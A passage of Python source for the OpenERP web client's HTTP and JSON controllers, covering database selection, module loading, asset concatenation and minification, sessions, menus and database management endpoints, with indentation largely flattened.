groups[3] or
(groups[4] and '\n') or
(groups[5] and ' ') or
(groups[6] and ' ') or
(groups[7] and ' ') or
''
)
result = re.sub(
r'([^\047"/\000-\040]+)|((?:(?:\047[^\047\\\r\n]*(?:\\(?:[^\r\n]|\r?'
r'\n|\r)[^\047\\\r\n]*)*\047)|(?:"[^"\\\r\n]*(?:\\(?:[^\r\n]|\r?\n|'
r'\r)[^"\\\r\n]*)*"))[^\047"/\000-\040]*)|(?:(?<=[(,=:\[!&|?{};\r\n]'
r')(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/'
r'))*((?:/(?![\r\n/*])[^/\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*'
r'(?:\\[^\r\n][^\\\]\r\n]*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*'
r'))|(?:(?<=[\000-#%-,./:-@\[-^`{-~-]return)(?:[\000-\011\013\014\01'
r'6-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*((?:/(?![\r\n/*])[^/'
r'\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*(?:\\[^\r\n][^\\\]\r\n]'
r'*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*))|(?<=[^\000-!#%&(*,./'
r':-@\[\\^`{|~])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/'
r'*][^*]*\*+)*/))*(?:((?:(?://[^\r\n]*)?[\r\n]))(?:[\000-\011\013\01'
r'4\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*)+(?=[^\000-\040"#'
r'%-\047)*,./:-@\\-^`|-~])|(?<=[^\000-#%-,./:-@\[-^`{-~-])((?:[\000-'
r'\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=[^'
r'\000-#%-,./:-@\[-^`{-~-])|(?<=\+)((?:[\000-\011\013\014\016-\040]|'
r'(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=\+)|(?<=-)((?:[\000-\011\0'
r'13\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=-)|(?:[\0'
r'00-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))+|(?:'
r'(?:(?://[^\r\n]*)?[\r\n])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*'
r']*\*+(?:[^/*][^*]*\*+)*/))*)+', subber, '\n%s\n' % script
).strip()
return result
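# Hedged illustration (hypothetical snippet, not part of the original file):
# comments collapse and runs of whitespace shrink, while string literals are
# preserved verbatim.
def _demo_rjsmin():
    return rjsmin('var a = 1; /* comment */\nvar s = "a  b";')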
def db_list(req, force=False):
proxy = req.session.proxy("db")
dbs = proxy.list(force)
h = req.httprequest.environ['HTTP_HOST'].split(':')[0]
d = h.split('.')[0]
r = openerp.tools.config['dbfilter'].replace('%h', h).replace('%d', d)
dbs = [i for i in dbs if re.match(r, i)]
return dbs
def db_monodb_redirect(req):
return db_redirect(req, not config['list_db'])
def db_redirect(req, match_first_only_if_unique):
db = False
redirect = False
dbs = db_list(req, True)
# 1 try the db in the url
db_url = req.params.get('db')
if db_url and db_url in dbs:
return (db_url, False)
# 2 use the database from the cookie if it's listable and still listed
cookie_db = req.httprequest.cookies.get('last_used_database')
if cookie_db in dbs:
db = cookie_db
# 3 use the first db if user can list databases
if dbs and not db and (not match_first_only_if_unique or len(dbs) == 1):
db = dbs[0]
# redirect to the chosen db if multiple are available
if db and len(dbs) > 1:
query = dict(urlparse.parse_qsl(req.httprequest.query_string, keep_blank_values=True))
query.update({'db': db})
redirect = req.httprequest.path + '?' + urllib.urlencode(query)
return (db, redirect)
def db_monodb(req):
# if only one db exists, return it else return False
return db_redirect(req, True)[0]
def redirect_with_hash(req, url, code=303):
# Most IE and Safari versions decided not to preserve location.hash upon
# redirect. And even if IE10 pretends to support it, it still fails
# inexplicably in case of multiple redirects (and we do have some).
# See extensive test page at http://greenbytes.de/tech/tc/httpredirects/
return "<html><head><script>window.location = '%s' + location.hash;</script></head></html>" % url
def module_topological_sort(modules):
""" Return a list of module names sorted so that their dependencies of the
modules are listed before the module itself
modules is a dict of {module_name: dependencies}
:param modules: modules to sort
:type modules: dict
:returns: list(str)
"""
dependencies = set(itertools.chain.from_iterable(modules.itervalues()))
# incoming edge: dependency on other module (if a depends on b, a has an
# incoming edge from b, aka there's an edge from b to a)
# outgoing edge: other module depending on this one
# [Tarjan 1976], http://en.wikipedia.org/wiki/Topological_sorting#Algorithms
#L ← Empty list that will contain the sorted nodes
L = []
#S ← Set of all nodes with no outgoing edges (modules on which no other
# module depends)
S = set(module for module in modules if module not in dependencies)
visited = set()
#function visit(node n)
def visit(n):
#if n has not been visited yet then
if n not in visited:
#mark n as visited
visited.add(n)
            #change: n is not a web module and cannot be resolved, ignore it
if n not in modules: return
#for each node m with an edge from m to n do (dependencies of n)
for m in modules[n]:
#visit(m)
visit(m)
#add n to L
L.append(n)
#for each node n in S do
for n in S:
#visit(n)
visit(n)
return L
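# Hedged illustration (hypothetical module names, not part of the original
# file): dependencies come out before their dependents.
def _demo_module_topological_sort():
    order = module_topological_sort({
        'web': [],
        'web_kanban': ['web'],
        'web_calendar': ['web'],
    })
    assert order.index('web') < order.index('web_kanban')
    assert order.index('web') < order.index('web_calendar')
    return order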
def module_installed(req):
    # Candidate modules: the current heuristic is the presence of a /static dir
loadable = openerpweb.addons_manifest.keys()
modules = {}
# Retrieve database installed modules
# TODO The following code should move to ir.module.module.list_installed_modules()
Modules = req.session.model('ir.module.module')
domain = [('state','=','installed'), ('name','in', loadable)]
for module in Modules.search_read(domain, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = req.session.model('ir.module.module.dependency').read(deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_installed_bypass_session(dbname):
loadable = openerpweb.addons_manifest.keys()
modules = {}
try:
registry = openerp.modules.registry.RegistryManager.get(dbname)
with registry.cursor() as cr:
m = registry.get('ir.module.module')
# TODO The following code should move to ir.module.module.list_installed_modules()
            domain = [('state','=','installed'), ('name','in', loadable)]
            ids = m.search(cr, 1, domain)
for module in m.read(cr, 1, ids, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = registry.get('ir.module.module.dependency').read(cr, 1, deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
except Exception,e:
pass
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_boot(req, db=None):
server_wide_modules = openerp.conf.server_wide_modules or ['web']
serverside = []
dbside = []
for i in server_wide_modules:
if i in openerpweb.addons_manifest:
serverside.append(i)
monodb = db or db_monodb(req)
if monodb:
dbside = module_installed_bypass_session(monodb)
dbside = [i for i in dbside if i not in serverside]
addons = serverside + dbside
return addons
def concat_xml(file_list):
"""Concatenate xml files
:param list(str) file_list: list of files to check
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
root = None
for fname in file_list:
with open(fname, 'rb') as fp:
contents = fp.read()
checksum.update(contents)
fp.seek(0)
xml = ElementTree.parse(fp).getroot()
if root is None:
root = ElementTree.Element(xml.tag)
#elif root.tag != xml.tag:
        # raise ValueError("Root tags mismatch: %r != %r" % (root.tag, xml.tag))
for child in xml.getchildren():
root.append(child)
return ElementTree.tostring(root, 'utf-8'), checksum.hexdigest()
def concat_files(file_list, reader=None, intersperse=""):
""" Concatenates contents of all provided files
:param list(str) file_list: list of files to check
:param function reader: reading procedure for each file
:param str intersperse: string to intersperse between file contents
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
if reader is None:
def reader(f):
import codecs
with codecs.open(f, 'rb', "utf-8-sig") as fp:
return fp.read().encode("utf-8")
files_content = []
for fname in file_list:
contents = reader(fname)
checksum.update(contents)
files_content.append(contents)
files_concat = intersperse.join(files_content)
return files_concat, checksum.hexdigest()
concat_js_cache = {}
def concat_js(file_list):
content, checksum = concat_files(file_list, intersperse=';')
if checksum in concat_js_cache:
content = concat_js_cache[checksum]
else:
content = rjsmin(content)
concat_js_cache[checksum] = content
return content, checksum
def fs2web(path):
"""convert FS path into web path"""
return '/'.join(path.split(os.path.sep))
def manifest_glob(req, extension, addons=None, db=None):
if addons is None:
addons = module_boot(req, db=db)
else:
addons = addons.split(',')
r = []
for addon in addons:
manifest = openerpweb.addons_manifest.get(addon, None)
if not manifest:
continue
        # ensure the addons path does not end with /
addons_path = os.path.join(manifest['addons_path'], '')[:-1]
globlist = manifest.get(extension, [])
for pattern in globlist:
for path in glob.glob(os.path.normpath(os.path.join(addons_path, addon, pattern))):
r.append((path, fs2web(path[len(addons_path):])))
return r
def manifest_list(req, extension, mods=None, db=None):
""" list ressources to load specifying either:
mods: a comma separated string listing modules
db: a database name (return all installed modules in that database)
"""
if not req.debug:
path = '/web/webclient/' + extension
if mods is not None:
path += '?' + urllib.urlencode({'mods': mods})
elif db:
path += '?' + urllib.urlencode({'db': db})
return [path]
files = manifest_glob(req, extension, addons=mods, db=db)
return [wp for _fp, wp in files]
def get_last_modified(files):
""" Returns the modification time of the most recently modified
file provided
:param list(str) files: names of files to check
:return: most recent modification time amongst the fileset
:rtype: datetime.datetime
"""
files = list(files)
if files:
return max(datetime.datetime.fromtimestamp(os.path.getmtime(f))
for f in files)
return datetime.datetime(1970, 1, 1)
def make_conditional(req, response, last_modified=None, etag=None):
""" Makes the provided response conditional based upon the request,
and mandates revalidation from clients
Uses Werkzeug's own :meth:`ETagResponseMixin.make_conditional`, after
setting ``last_modified`` and ``etag`` correctly on the response object
:param req: OpenERP request
:type req: web.common.http.WebRequest
:param response: Werkzeug response
:type response: werkzeug.wrappers.Response
:param datetime.datetime last_modified: last modification date of the response content
:param str etag: some sort of checksum of the content (deep etag)
:return: the response object provided
:rtype: werkzeug.wrappers.Response
"""
response.cache_control.must_revalidate = True
response.cache_control.max_age = 0
if last_modified:
response.last_modified = last_modified
if etag:
response.set_etag(etag)
return response.make_conditional(req.httprequest)
def login_and_redirect(req, db, login, key, redirect_url='/'):
wsgienv = req.httprequest.environ
env = dict(
base_location=req.httprequest.url_root.rstrip('/'),
HTTP_HOST=wsgienv['HTTP_HOST'],
REMOTE_ADDR=wsgienv['REMOTE_ADDR'],
)
req.session.authenticate(db, login, key, env)
return set_cookie_and_redirect(req, redirect_url)
def set_cookie_and_redirect(req, redirect_url):
redirect = werkzeug.utils.redirect(redirect_url, 303)
redirect.autocorrect_location_header = False
cookie_val = urllib2.quote(simplejson.dumps(req.session_id))
redirect.set_cookie('instance0|session_id', cookie_val)
return redirect
def load_actions_from_ir_values(req, key, key2, models, meta):
Values = req.session.model('ir.values')
actions = Values.get(key, key2, models, meta, req.context)
return [(id, name, clean_action(req, action))
for id, name, action in actions]
def clean_action(req, action):
action.setdefault('flags', {})
action_type = action.setdefault('type', 'ir.actions.act_window_close')
if action_type == 'ir.actions.act_window':
return fix_view_modes(action)
return action
# I think generate_views,fix_view_modes should go into js ActionManager
def generate_views(action):
"""
While the server generates a sequence called "views" computing dependencies
between a bunch of stuff for views coming directly from the database
(the ``ir.actions.act_window model``), it's also possible for e.g. buttons
to return custom view dictionaries generated on the fly.
In that case, there is no ``views`` key available on the action.
Since the web client relies on ``action['views']``, generate it here from
``view_mode`` and ``view_id``.
Currently handles two different cases:
* no view_id, multiple view_mode
* single view_id, single view_mode
:param dict action: action descriptor dictionary to generate a views key for
"""
view_id = action.get('view_id') or False
if isinstance(view_id, (list, tuple)):
view_id = view_id[0]
# providing at least one view mode is a requirement, not an option
view_modes = action['view_mode'].split(',')
if len(view_modes) > 1:
if view_id:
raise ValueError('Non-db action dictionaries should provide '
'either multiple view modes or a single view '
'mode and an optional view id.\n\n Got view '
'modes %r and view id %r for action %r' % (
view_modes, view_id, action))
action['views'] = [(False, mode) for mode in view_modes]
return
action['views'] = [(view_id, view_modes[0])]
def fix_view_modes(action):
""" For historical reasons, OpenERP has weird dealings in relation to
view_mode and the view_type attribute (on window actions):
* one of the view modes is ``tree``, which stands for both list views
and tree views
* the choice is made by checking ``view_type``, which is either
``form`` for a list view or ``tree`` for an actual tree view
    This method simply folds the view_type into view_mode by adding a
new view mode ``list`` which is the result of the ``tree`` view_mode
in conjunction with the ``form`` view_type.
TODO: this should go into the doc, some kind of "peculiarities" section
:param dict action: an action descriptor
:returns: nothing, the action is modified in place
"""
if not action.get('views'):
generate_views(action)
if action.pop('view_type', 'form') != 'form':
return action
if 'view_mode' in action:
action['view_mode'] = ','.join(
mode if mode != 'tree' else 'list'
for mode in action['view_mode'].split(','))
action['views'] = [
[id, mode if mode != 'tree' else 'list']
for id, mode in action['views']
]
return action
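# Hedged illustration (hypothetical action dict, not part of the original
# file): the legacy ``tree`` mode combined with ``view_type == 'form'`` is
# folded into the ``list`` mode.
def _demo_fix_view_modes():
    action = {'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False}
    fix_view_modes(action)
    assert action['view_mode'] == 'list,form'
    assert action['views'] == [[False, 'list'], [False, 'form']]
    return action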
def _local_web_translations(trans_file):
messages = []
try:
with open(trans_file) as t_file:
po = babel.messages.pofile.read_po(t_file)
except Exception:
return
for x in po:
if x.id and x.string and "openerp-web" in x.auto_comments:
messages.append({'id': x.id, 'string': x.string})
return messages
def xml2json_from_elementtree(el, preserve_whitespaces=False):
""" xml2json-direct
Simple and straightforward XML-to-JSON converter in Python
New BSD Licensed
http://code.google.com/p/xml2json-direct/
"""
res = {}
if el.tag[0] == "{":
ns, name = el.tag.rsplit("}", 1)
res["tag"] = name
res["namespace"] = ns[1:]
else:
res["tag"] = el.tag
res["attrs"] = {}
for k, v in el.items():
res["attrs"][k] = v
kids = []
if el.text and (preserve_whitespaces or el.text.strip() != ''):
kids.append(el.text)
for kid in el:
kids.append(xml2json_from_elementtree(kid, preserve_whitespaces))
if kid.tail and (preserve_whitespaces or kid.tail.strip() != ''):
kids.append(kid.tail)
res["children"] = kids
return res
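# Hedged illustration (hypothetical document, not part of the original file):
# attributes land in ``attrs`` and text/child nodes are interleaved in
# ``children``.
def _demo_xml2json_from_elementtree():
    el = ElementTree.fromstring('<a b="1">hi<c/></a>')
    res = xml2json_from_elementtree(el)
    assert res['tag'] == 'a'
    assert res['attrs'] == {'b': '1'}
    return res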
def content_disposition(filename, req):
filename = ustr(filename)
escaped = urllib2.quote(filename.encode('utf8'))
browser = req.httprequest.user_agent.browser
version = int((req.httprequest.user_agent.version or '0').split('.')[0])
if browser == 'msie' and version < 9:
return "attachment; filename=%s" % escaped
elif browser == 'safari':
return u"attachment; filename=%s" % filename
else:
return "attachment; filename*=UTF-8''%s" % escaped
#----------------------------------------------------------
# OpenERP Web web Controllers
#----------------------------------------------------------
html_template = """<!DOCTYPE html>
<html style="height: 100%%">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>OpenERP</title>
<link rel="shortcut icon" href="/web/static/src/img/favicon.ico" type="image/x-icon"/>
<link rel="stylesheet" href="/web/static/src/css/full.css" />
%(css)s
%(js)s
<script type="text/javascript">
$(function() {
var s = new openerp.init(%(modules)s);
%(init)s
});
</script>
</head>
<body>
<!--[if lte IE 8]>
<script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1/CFInstall.min.js"></script>
<script>CFInstall.check({mode: "overlay"});</script>
<![endif]-->
</body>
</html>
"""
class Home(openerpweb.Controller):
_cp_path = '/'
@openerpweb.httprequest
def index(self, req, s_action=None, db=None, **kw):
db, redir = db_monodb_redirect(req)
if redir:
return redirect_with_hash(req, redir)
js = "\n ".join('<script type="text/javascript" src="%s"></script>' % i for i in manifest_list(req, 'js', db=db))
css = "\n ".join('<link rel="stylesheet" href="%s">' % i for i in manifest_list(req, 'css', db=db))
r = html_template % {
'js': js,
'css': css,
'modules': simplejson.dumps(module_boot(req, db=db)),
'init': 'var wc = new s.web.WebClient();wc.appendTo($(document.body));'
}
return r
@openerpweb.httprequest
def login(self, req, db, login, key):
if db not in db_list(req, True):
return werkzeug.utils.redirect('/', 303)
return login_and_redirect(req, db, login, key)
class WebClient(openerpweb.Controller):
_cp_path = "/web/webclient"
@openerpweb.jsonrequest
def csslist(self, req, mods=None):
return manifest_list(req, 'css', mods=mods)
@openerpweb.jsonrequest
def jslist(self, req, mods=None):
return manifest_list(req, 'js', mods=mods)
@openerpweb.jsonrequest
def qweblist(self, req, mods=None):
return manifest_list(req, 'qweb', mods=mods)
@openerpweb.httprequest
def css(self, req, mods=None, db=None):
files = list(manifest_glob(req, 'css', addons=mods, db=db))
last_modified = get_last_modified(f[0] for f in files)
if req.httprequest.if_modified_since and req.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
file_map = dict(files)
rx_import = re.compile(r"""@import\s+('|")(?!'|"|/|https?://)""", re.U)
rx_url = re.compile(r"""url\s*\(\s*('|"|)(?!'|"|/|https?://|data:)""", re.U)
def reader(f):
"""read the a css file and absolutify all relative uris"""
with open(f, 'rb') as fp:
data = fp.read().decode('utf-8')
path = file_map[f]
web_dir = os.path.dirname(path)
data = re.sub(
rx_import,
r"""@import \1%s/""" % (web_dir,),
data,
)
data = re.sub(
rx_url,
r"""url(\1%s/""" % (web_dir,),
data,
)
return data.encode('utf-8')
content, checksum = concat_files((f[0] for f in files), reader)
# move up all @import and @charset rules to the top
matches = []
def push(matchobj):
matches.append(matchobj.group(0))
return ''
content = re.sub(re.compile("(@charset.+;$)", re.M), push, content)
content = re.sub(re.compile("(@import.+;$)", re.M), push, content)
matches.append(content)
content = '\n'.join(matches)
return make_conditional(
req, req.make_response(content, [('Content-Type', 'text/css')]),
last_modified, checksum)
@openerpweb.httprequest
def js(self, req, mods=None, db=None):
files = [f[0] for f in manifest_glob(req, 'js', addons=mods, db=db)]
last_modified = get_last_modified(files)
if req.httprequest.if_modified_since and req.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_js(files)
return make_conditional(
req, req.make_response(content, [('Content-Type', 'application/javascript')]),
last_modified, checksum)
@openerpweb.httprequest
def qweb(self, req, mods=None, db=None):
files = [f[0] for f in manifest_glob(req, 'qweb', addons=mods, db=db)]
last_modified = get_last_modified(files)
if req.httprequest.if_modified_since and req.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_xml(files)
return make_conditional(
req, req.make_response(content, [('Content-Type', 'text/xml')]),
last_modified, checksum)
@openerpweb.jsonrequest
def bootstrap_translations(self, req, mods):
""" Load local translations from *.po files, as a temporary solution
until we have established a valid session. This is meant only
for translating the login page and db management chrome, using
the browser's language. """
# For performance reasons we only load a single translation, so for
# sub-languages (that should only be partially translated) we load the
# main language PO instead - that should be enough for the login screen.
lang = req.lang.split('_')[0]
translations_per_module = {}
for addon_name in mods:
if openerpweb.addons_manifest[addon_name].get('bootstrap'):
addons_path = openerpweb.addons_manifest[addon_name]['addons_path']
f_name = os.path.join(addons_path, addon_name, "i18n", lang + ".po")
if not os.path.exists(f_name):
continue
translations_per_module[addon_name] = {'messages': _local_web_translations(f_name)}
return {"modules": translations_per_module,
"lang_parameters": None}
@openerpweb.jsonrequest
def translations(self, req, mods, lang):
res_lang = req.session.model('res.lang')
ids = res_lang.search([("code", "=", lang)])
lang_params = None
if ids:
lang_params = res_lang.read(ids[0], ["direction", "date_format", "time_format",
"grouping", "decimal_point", "thousands_sep"])
# Regional languages (ll_CC) must inherit/override their parent lang (ll), but this is
# done server-side when the language is loaded, so we only need to load the user's lang.
ir_translation = req.session.model('ir.translation')
translations_per_module = {}
messages = ir_translation.search_read([('module','in',mods),('lang','=',lang),
('comments','like','openerp-web'),('value','!=',False),
('value','!=','')],
['module','src','value','lang'], order='module')
for mod, msg_group in itertools.groupby(messages, key=operator.itemgetter('module')):
translations_per_module.setdefault(mod,{'messages':[]})
translations_per_module[mod]['messages'].extend({'id': m['src'],
'string': m['value']} \
for m in msg_group)
return {"modules": translations_per_module,
"lang_parameters": lang_params}
@openerpweb.jsonrequest
def version_info(self, req):
return openerp.service.web_services.RPC_VERSION_1
class Proxy(openerpweb.Controller):
_cp_path = '/web/proxy'
@openerpweb.jsonrequest
def load(self, req, path):
""" Proxies an HTTP request through a JSON request.
It is strongly recommended to not request binary files through this,
as the result will be a binary data blob as well.
:param req: OpenERP request
:param path: actual request path
:return: file content
"""
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
return Client(req.httprequest.app, BaseResponse).get(path).data
class Database(openerpweb.Controller):
_cp_path = "/web/database"
@openerpweb.jsonrequest
def get_list(self, req):
# TODO change js to avoid calling this method if in monodb mode
try:
return db_list(req)
except xmlrpclib.Fault:
monodb = db_monodb(req)
if monodb:
return [monodb]
raise
@openerpweb.jsonrequest
def create(self, req, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
return req.session.proxy("db").create_database(
params['super_admin_pwd'],
params['db_name'],
bool(params.get('demo_data')),
params['db_lang'],
params['create_admin_pwd'])
@openerpweb.jsonrequest
def duplicate(self, req, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
duplicate_attrs = (
params['super_admin_pwd'],
params['db_original_name'],
params['db_name'],
)
return req.session.proxy("db").duplicate_database(*duplicate_attrs)
@openerpweb.jsonrequest
def drop(self, req, fields):
password, db = operator.itemgetter(
'drop_pwd', 'drop_db')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
if req.session.proxy("db").drop(password, db):return True
except xmlrpclib.Fault, e:
if e.faultCode and e.faultCode.split(':')[0] == 'AccessDenied':
return {'error': e.faultCode, 'title': 'Drop Database'}
return {'error': _('Could not drop database !'), 'title': _('Drop Database')}
@openerpweb.httprequest
def backup(self, req, backup_db, backup_pwd, token):
try:
db_dump = base64.b64decode(
req.session.proxy("db").dump(backup_pwd, backup_db))
filename = "%(db)s_%(timestamp)s.dump" % {
'db': backup_db,
'timestamp': datetime.datetime.utcnow().strftime(
"%Y-%m-%d_%H-%M-%SZ")
}
return req.make_response(db_dump,
[('Content-Type', 'application/octet-stream; charset=binary'),
('Content-Disposition', content_disposition(filename, req))],
{'fileToken': token}
)
except xmlrpclib.Fault, e:
return simplejson.dumps([[],[{'error': e.faultCode, 'title': _('Backup Database')}]])
@openerpweb.httprequest
def restore(self, req, db_file, restore_pwd, new_db):
try:
data = base64.b64encode(db_file.read())
req.session.proxy("db").restore(restore_pwd, new_db, data)
return ''
except xmlrpclib.Fault, e:
if e.faultCode and e.faultCode.split(':')[0] == 'AccessDenied':
raise Exception("AccessDenied")
@openerpweb.jsonrequest
def change_password(self, req, fields):
old_password, new_password = operator.itemgetter(
'old_pwd', 'new_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
return req.session.proxy("db").change_admin_password(old_password, new_password)
except xmlrpclib.Fault, e:
if e.faultCode and e.faultCode.split(':')[0] == 'AccessDenied':
return {'error': e.faultCode, 'title': _('Change Password')}
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
class Session(openerpweb.Controller):
_cp_path = "/web/session"
def session_info(self, req):
req.session.ensure_valid()
return {
"session_id": req.session_id,
"uid": req.session._uid,
"user_context": req.session.get_context() if req.session._uid else {},
"db": req.session._db,
"username": req.session._login,
}
@openerpweb.jsonrequest
def get_session_info(self, req):
return self.session_info(req)
@openerpweb.jsonrequest
def authenticate(self, req, db, login, password, base_location=None):
wsgienv = req.httprequest.environ
env = dict(
base_location=base_location,
HTTP_HOST=wsgienv['HTTP_HOST'],
REMOTE_ADDR=wsgienv['REMOTE_ADDR'],
)
req.session.authenticate(db, login, password, env)
return self.session_info(req)
@openerpweb.jsonrequest
def change_password (self,req,fields):
old_password, new_password,confirm_password = operator.itemgetter('old_pwd', 'new_password','confirm_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
if not (old_password.strip() and new_password.strip() and confirm_password.strip()):
return {'error':_('You cannot leave any password empty.'),'title': _('Change Password')}
if new_password != confirm_password:
return {'error': _('The new password and its confirmation must be identical.'),'title': _('Change Password')}
try:
if req.session.model('res.users').change_password(
old_password, new_password):
return {'new_password':new_password}
except Exception:
return {'error': _('The old password you provided is incorrect, your password was not changed.'), 'title': _('Change Password')}
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
@openerpweb.jsonrequest
def sc_list(self, req):
return req.session.model('ir.ui.view_sc').get_sc(
req.session._uid, "ir.ui.menu", req.context)
@openerpweb.jsonrequest
def get_lang_list(self, req):
try:
return req.session.proxy("db").list_lang() or []
except Exception, e:
return {"error": e, "title": _("Languages")}
@openerpweb.jsonrequest
def modules(self, req):
# return all installed modules. Web client is smart enough to not load a module twice
return module_installed(req)
@openerpweb.jsonrequest
def save_session_action(self, req, the_action):
"""
        This method stores an action object in the session and returns an integer
identifying that action. The method get_session_action() can be used to get
back the action.
:param the_action: The action to save in the session.
:type the_action: anything
:return: A key identifying the saved action.
:rtype: integer
"""
saved_actions = req.httpsession.get('saved_actions')
if not saved_actions:
saved_actions = {"next":1, "actions":{}}
req.httpsession['saved_actions'] = saved_actions
# we don't allow more than 10 stored actions
if len(saved_actions["actions"]) >= 10:
del saved_actions["actions"][min(saved_actions["actions"])]
key = saved_actions["next"]
saved_actions["actions"][key] = the_action
saved_actions["next"] = key + 1
return key
@openerpweb.jsonrequest
def get_session_action(self, req, key):
"""
        Gets back a previously saved action. This method can return None if the
        action was saved too long ago (callers should handle that case
        gracefully).
:param key: The key given by save_session_action()
:type key: integer
:return: The saved action or None.
:rtype: anything
"""
saved_actions = req.httpsession.get('saved_actions')
if not saved_actions:
return None
return saved_actions["actions"].get(key)
@openerpweb.jsonrequest
def check(self, req):
req.session.assert_valid()
return None
@openerpweb.jsonrequest
def destroy(self, req):
req.session._suicide = True
class Menu(openerpweb.Controller):
_cp_path = "/web/menu"
@openerpweb.jsonrequest
def get_user_roots(self, req):
""" Return all root menu ids visible for the session user.
:param req: A request object, with an OpenERP session attribute
:type req: < session -> OpenERPSession >
:return: the root menu ids
:rtype: list(int)
"""
s = req.session
Menus = s.model('ir.ui.menu')
# If a menu action is defined use its domain to get the root menu items
user_menu_id = s.model('res.users').read([s._uid], ['menu_id'],
req.context)[0]['menu_id']
menu_domain = [('parent_id', '=', False)]
if user_menu_id:
domain_string = s.model('ir.actions.act_window').read(
[user_menu_id[0]], ['domain'],req.context)[0]['domain']
if domain_string:
menu_domain = ast.literal_eval(domain_string)
return Menus.search(menu_domain, 0, False, False, req.context)
@openerpweb.jsonrequest
def load(self, req):
""" Loads all menu items (all applications and their sub-menus).
:param req: A request object, with an OpenERP session attribute
:type req: < session -> OpenERPSession >
:return: the menu root
:rtype: dict('children': menu_nodes)
"""
Menus = req.session.model('ir.ui.menu')
fields = ['name', 'sequence', 'parent_id', 'action']
menu_root_ids = self.get_user_roots(req)
menu_roots = Menus.read(menu_root_ids, fields, req.context) if menu_root_ids else []
menu_root = {
'id': False,
'name': 'root',
'parent_id': [-1, ''],
'children': menu_roots,
'all_menu_ids': menu_root_ids,
}
if not menu_roots:
return menu_root
        # menus are loaded fully, unlike a regular tree view, because there are
        # a limited number of items (752 when all 6.1 addons are installed)
menu_ids = Menus.search([('id', 'child_of', menu_root_ids)], 0, False, False, req.context)
menu_items = Menus.read(menu_ids, fields, req.context)
# adds roots at the end of the sequence, so that they will overwrite
# equivalent menu items from full menu read when put into id:item
# mapping, resulting in children being correctly set on the roots.
menu_items.extend(menu_roots)
menu_root['all_menu_ids'] = menu_ids # includes menu_root_ids!
# make a tree using parent_id
menu_items_map = dict(
(menu_item["id"], menu_item) for menu_item in menu_items)
for menu_item in menu_items:
if menu_item['parent_id']:
parent = menu_item['parent_id'][0]
else:
parent = False
if parent in menu_items_map:
menu_items_map[parent].setdefault(
'children', []).append(menu_item)
        # sort each node's children by sequence
for menu_item in menu_items:
menu_item.setdefault('children', []).sort(
key=operator.itemgetter('sequence'))
return menu_root
@openerpweb.jsonrequest
def load_needaction(self, req, menu_ids):
""" Loads needaction counters for specific menu ids.
:return: needaction data
:rtype: dict(menu_id: {'needaction_enabled': boolean, 'needaction_counter': int})
"""
return req.session.model('ir.ui.menu').get_needaction_data(menu_ids, req.context)
@openerpweb.jsonrequest
def action(self, req, menu_id):
# still used by web_shortcut
actions = load_actions_from_ir_values(req,'action', 'tree_but_open',
[('ir.ui.menu', menu_id)], False)
return {"action": actions}
class DataSet(openerpweb.Controller):
_cp_path = "/web/dataset"
@openerpweb.jsonrequest
def search_read(self, req, model, fields=False, offset=0, limit=False, domain=None, sort=None):
return self.do_search_read(req, model, fields, offset, limit, domain, sort)
def do_search_read(self, req, model, fields=False, offset=0, limit=False, domain=None
, sort=None):
""" Performs a search() followed by a read() (if needed) using the
provided search criteria
:param req: a JSON-RPC request object
:type req: openerpweb.JsonRequest
:param str model: the name of the model to search on
:param fields: a list of the fields to return in the result records
:type fields: [str]
:param int offset: from which index should the results start being returned
:param int limit: the maximum number of records to return
:param list domain: the search domain for the query
:param list sort: sorting directives
        :returns: A structure (dict) with two keys: ``length`` (the number
                  of records matching the (domain, context) pair) and
                  ``records`` (the paginated records matching the fields
                  selection set)
        :rtype: dict
"""
Model = req.session.model(model)
ids = Model.search(domain, offset or 0, limit or False, sort or False,
req.context)
if limit and len(ids) == limit:
length = Model.search_count(domain, req.context)
else:
length = len(ids) + (offset or 0)
if fields and fields == ['id']:
# shortcut read if we only want the ids
